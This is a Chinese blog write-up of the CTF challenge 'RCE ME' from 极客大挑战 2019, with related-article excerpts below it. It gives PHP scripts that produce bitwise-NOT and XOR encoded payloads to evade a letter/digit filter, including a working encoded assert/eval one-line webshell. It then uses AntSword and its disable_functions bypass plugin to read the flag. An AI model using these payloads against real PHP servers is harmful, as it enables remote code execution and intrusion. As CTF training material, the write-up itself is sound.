【[极客大挑战 2019]RCE ME 1】

最新推荐文章于 2024-09-26 07:45:40 发布
最新推荐文章于 2024-09-26 07:45:40 发布
阅读量632 收藏 7
点赞数 11
CC 4.0 BY-SA版权
分类专栏: CTF-web-wp 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ubaichu/article/details/140361077

目录

题目

在这里插入图片描述

代码分析

过滤了大小写字母和数字,传入函数后可以执行,我们先尝试传入phpinbfo,再尝试传入一句话木马。

传入phpinfo

我们的目标是传入phpinfo执行
有两种方式可以绕过
1、取反绕过:取反后url编码
取反后,url解码会解成不可打印字符,绕过过滤

<?php
$a = 'phpinfo';
$b = urlencode(~$a);
$c = '(~'.$b.')();';
echo $c;
?>

结果:(~%8F%97%8F%96%91%99%90)();
2、异或绕过
结果:(%22%80%80%80%80%80%80%80%22^%22%f0%e8%f0%e9%ee%e6%ef%22)();

payload:?code=(~%8F%97%8F%96%91%99%90)();
get传入后得到phpinfo界面在这里插入图片描述
搜索flag无果
发现禁用的函数
在这里插入图片描述

传入一句话木马

接下来我们尝试构造一句话木马
eval 属于PHP语法构造的一部分,eval()是一个语言构造器,不能被可变函数调用,所以不能通过 变量函数的形式来调用
assert不可以执行’echo 1’等命令
我们使用的一句话木马:(assert)(eval($_POST[“test”]))

取反:

<?php

//(assert)(eval($_POST['g']))
$a = 'assert';
$b = urlencode(~$a);
$c = '(eval($_POST[g]))';
$d = urlencode(~$c);
$e = '(~'.$b.')'.'(~'.$d.')';
echo $e;
?>

结果:
(%9E%8C%8C%9A%8D%8B)(%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%98%A2%D6%D6)

用蚁剑连接

在这里插入图片描述
发现flag但是无法查看,需要用插件绕过

使用插件读取flag

利用蚁剑中自带的插件:绕过diasble_functions
(这个插件只能在linux中使用)
在这里插入图片描述
在这里插入图片描述
点击开始,然后readflag
在这里插入图片描述

[极客挑战 2019]RCE ME
没有任何buff的小菜鸡的博客
03-06 458
突然有觉得这道题双解法挺好的就记录一下嗷 题目: <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
BUUCTF[极客挑战 2019]RCE ME1
wyp106343873的博客
12-06 1431
一个个人的学习过程
【BUUCTF】[极客挑战 2019]RCE ME
aoao331198的博客
07-09 756
源码 首先是PHP正则绕过,有长度限制,考虑使用取反绕过 首先试试看看phpinfo 重点看这个禁用函数,禁用了很多函数 下一步试着传木马 蚁剑连接一下,显然这里需要 但是由于禁用了命令执行的函数,这里要进行绕过 网上有两种方法,一种是使用蚁剑的插件,科学上网才能下载得到 另一种是通过 & 绕过 这里不做详细讲述了,具体可以看看我的个人博客here 上传文件后使用PL...
[极客挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 539
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
[极客挑战 2019]RCE ME 1
02-09
### 极客挑战 2019 RCE ME 1 解题报告 #### 背景介绍 极客挑战(Geek Challenge)是一项面向网络安全爱好者的竞赛活动,涵盖了多个安全领域的内容。其中Web漏洞利用是常见的题目类型之一。RCE ME 1 是该赛事中...
[极客挑战 2019]RCE ME1
alwtj的博客
09-26 925
之前我们提到了,他禁用了很多函数方法,我们可以通过下面蚁剑的绕过disable_functions的插件进行绕过.看来禁用的还是比较多的一会可能需要使用这些被使用了disable_function()的函数了.意思就是我们传入的code的value要到达eval()函数,我们需要绕过两个过滤。首先是长度不能于40,之后便是我们传入的内容不能是小写字母以及0-9的数字.之后构造webshell,由于php版本的问题呢,我们不能直接构造。绕过方法呢可以使用取反绕过,以及异或绕过.,我们需要构造构造成。
BUUCTF 36
qq_52431855的博客
03-03 312
知识点 preg_match() 函数 语法:int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) 参数: 作用:在subject 字符串中搜索与pattern给出的正则表达式相匹配的内容。 关于PHP正则的一些绕过方法 36-1[BSidesCF 2019]Futurella 做题...
极客挑战 2019]RCE ME
zxnimud5的专栏
09-12 367
给了源码,过滤了小写数字,小于40长度 error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("ThisistooLong."); ...
rce me
最新发布
03-18
### 关于远程代码执行漏洞及其利用 #### 远程代码执行的概念 远程代码执行(Remote Code Execution, RCE)是一种安全漏洞,允许攻击者通过网络在目标设备上运行任意代码。这种类型的漏洞通常存在于应用程序、操作系统或其他软件组件中。一旦被成功利用,RCE 可能会带来严重的后果,例如数据泄露、系统控制权丢失以及进一步的恶意活动。 为了使一段易受攻击的代码能够被利用,该代码必须有足够的上下文来构建一个工具链(gadget chain),即一系列可重用的代码片段,在调用时会产生显著影响[^1]。 #### 实际案例分析 以 CVE-2014-6321 和 MS14-066 为例,这是微软 Schannel 中的一个远程代码执行漏洞。此漏洞源于加密协议实现中的缺陷,可能导致攻击者通过精心设计的数据包触发缓冲区溢出并最终获得远程代码执行权限[^4]。此类问题强调了及时更新补丁的重要性,因为官方已经发布了相应的修复措施。 另一个值得注意的例子涉及三星 Android 设备上的逻辑漏洞滥用情况。具体来说,某些定制服务如 WifiCredService 提供了一个完全可靠的攻击向量,无需绕过沙箱或者克服诸如地址空间布局随机化(ASLR)之类的防护机制即可达成目的[^3]。这表明原始设备制造商(OEM) 的自定义修改往往是安卓生态系统中最薄弱的一环。 #### 利用过程概述 当提到 Metasploit 框架下的 `java_mlet_server` 模块时,可以联想到它如何作为开发人员测试潜在 RCE 场景的一种手段[^2]。尽管这里并未详尽描述整个流程,但从时间戳可以看出当时正准备尝试某种方式去验证是否存在这样的风险。 以下是基于 Python 编写的简单模拟脚本用于演示基本概念而非实际操作: ```python import socket def send_payload(host, port, payload): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: s.connect((host, port)) s.sendall(payload.encode()) response = s.recv(1024).decode() print(f"Received {response}") except Exception as e: print(e) if __name__ == "__main__": target_host = "example.com" target_port = 9999 malicious_input = "exploit_command_here" send_payload(target_host, target_port, malicious_input) ``` 上述代码仅为教学用途展示发送特定负载至指定端口的过程,并不构成任何非法行为指导。 #### 防护建议 针对防范 RCE 攻击可以从以下几个方面入手: - 定期安装厂商发布的最新安全补丁; - 对输入参数进行全面校验过滤处理; - 减少不必要的外部暴露接口和服务数量; - 使用现代编译器选项启用各种保护功能比如 ASLR 或栈金丝雀(Stack Canaries);
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值